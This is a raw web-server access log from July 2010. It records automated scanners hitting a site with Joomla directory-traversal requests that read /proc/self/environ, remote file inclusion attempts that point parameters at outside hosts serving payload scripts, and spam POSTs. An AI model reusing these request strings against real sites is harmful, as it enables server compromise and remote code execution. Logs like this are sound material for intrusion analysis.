91.121.78.216 - - [31/Jul/2010:05:00:11 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:00:21 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:00:22 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:00:33 -0700] "GET /logs/access_100706.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:00:34 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:00:34 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
216.104.37.106 - - [31/Jul/2010:05:00:49 -0700] "GET /logs/access_100625.log////index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
216.104.37.106 - - [31/Jul/2010:05:00:49 -0700] "GET ///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.810" "www.puaga.com"
216.104.37.106 - - [31/Jul/2010:05:00:49 -0700] "GET /logs////index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:01:02 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:01:06 -0700] "GET /logs/access_100626.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:01:06 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:01:06 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:05:01:10 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:05:01:10 -0700] "POST /logs/access_100719.log%20%20/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
91.208.211.151 - - [31/Jul/2010:05:01:10 -0700] "POST /logs/contact.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.puaga.com"
222.255.121.216 - - [31/Jul/2010:05:01:14 -0700] "GET /logs/access_100502.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:01:16 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:01:16 -0700] "GET /logs/access_100612.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:01:16 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:01:17 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:01:27 -0700] "GET /logs/access_100321.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:01:27 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:01:27 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:01:31 -0700] "GET /logs/access_100624.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:01:31 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:01:31 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:01:36 -0700] "GET /logs/access_100626.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:01:36 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:01:36 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:01:40 -0700] "GET /logs/access_100604.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:01:45 -0700] "GET /logs/access_100530.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:02:15 -0700] "GET /logs/access_100530.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:02:22 -0700] "GET /logs/access_100321.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:02:22 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:02:22 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:02:28 -0700] "GET /logs/access_100706.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:02:28 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:02:29 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:02:32 -0700] "GET /logs/access_100612.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:02:59 -0700] "GET /logs/access_100313.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:02:59 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:02:59 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:03:13 -0700] "GET /logs/access_100313.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:03:13 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:03:13 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:03:13 -0700] "GET /logs/access_100612.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:03:18 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
83.149.110.213 - - [31/Jul/2010:05:03:20 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
83.149.110.213 - - [31/Jul/2010:05:03:20 -0700] "POST /logs//contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
83.149.110.213 - - [31/Jul/2010:05:03:21 -0700] "POST /logs/access_100321.log//contact.php HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:03:25 -0700] "GET /logs/access_100422.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:03:33 -0700] "GET /logs/access_100704.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:03:33 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:03:33 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:03:38 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:03:38 -0700] "GET /logs/access_100415.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:03:43 -0700] "GET /logs/access_100530.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:03:59 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:04:08 -0700] "GET /logs/access_100704.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:04:08 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:04:08 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:04:26 -0700] "GET /logs/access_100613.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:04:28 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
216.104.37.106 - - [31/Jul/2010:05:04:50 -0700] "GET /logs/access_100620.log////index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:05:12 -0700] "GET /logs/access_100613.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:05:05:38 -0700] "GET /logs/access_100226.log////?_SERVER[DOCUMENT_ROOT]=http://outsider-bg.com/_DOC/pid? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:06:19 -0700] "GET /logs/access_100316.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:06:19 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:06:19 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:06:35 -0700] "GET /logs/access_100316.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:06:35 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:06:35 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
77.222.34.35 - - [31/Jul/2010:05:06:50 -0700] "GET /logs/access_100415.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.votrepharma.com/sips/param/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.52 - - [31/Jul/2010:05:07:21 -0700] "GET /pnetsite/releases/PreviewRelease3.7.MC.sit HTTP/1.0" 200 1016704 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.pixero.net"
94.23.8.200 - - [31/Jul/2010:05:07:22 -0700] "GET /logs/access_100530.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:07:23 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:07:23 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:07:25 -0700] "GET /logs/access_100530.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:07:26 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:07:26 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:07:28 -0700] "GET /logs/access_100628.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:07:30 -0700] "GET /logs/access_100628.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:07:53 -0700] "GET /logs/access_100626.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:07:54 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:07:54 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:07:59 -0700] "GET /logs/access_100710.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:08:00 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:08:00 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:01 -0700] "POST /%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:01 -0700] "POST /logs/access_100617.log/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:01 -0700] "POST /logs/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:02 -0700] "POST /%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:02 -0700] "POST /logs/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:02 -0700] "POST /logs/access_100617.log/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:02 -0700] "POST /%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:02 -0700] "POST /logs/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:02 -0700] "POST /logs/access_100617.log/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:02 -0700] "POST /%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:02 -0700] "POST /logs/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:02 -0700] "POST /logs/access_100617.log/%22powered HTTP/1.0" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:03 -0700] "POST /%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:03 -0700] "POST /logs/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:03 -0700] "POST /logs/access_100617.log/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:03 -0700] "POST /%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:03 -0700] "POST /logs/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:03 -0700] "POST /logs/access_100617.log/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:03 -0700] "POST /logs/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.46.76 - - [31/Jul/2010:05:08:03 -0700] "POST /logs/access_100617.log/%22powered HTTP/1.1" 404 5258 "-" "MaMa CaSpEr" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:08:05 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:08:10 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:08:12 -0700] "GET /logs/access_100613.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:08:12 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:08:13 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:08:15 -0700] "GET /logs/access_100710.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:08:15 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:08:15 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
122.155.9.169 - - [31/Jul/2010:05:08:19 -0700] "GET /logs/access_100531.log/nullpo/hsList.php?subdir=http://aqws.interfree.it/id.jpg?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:08:20 -0700] "GET /logs/access_100628.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
66.71.245.122 - - [31/Jul/2010:05:08:20 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
122.155.9.169 - - [31/Jul/2010:05:08:20 -0700] "GET /nullpo/hsList.php?subdir=http://aqws.interfree.it/id.jpg?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
66.71.245.122 - - [31/Jul/2010:05:08:21 -0700] "POST /contact.php HTTP/1.1" 404 5258 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.puaga.com"
122.155.9.169 - - [31/Jul/2010:05:08:22 -0700] "GET /logs//nullpo/hsList.php?subdir=http://aqws.interfree.it/id.jpg?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:08:26 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.8.200 - - [31/Jul/2010:05:08:29 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:08:41 -0700] "GET /logs/access_100626.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.78.216 - - [31/Jul/2010:05:08:41 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
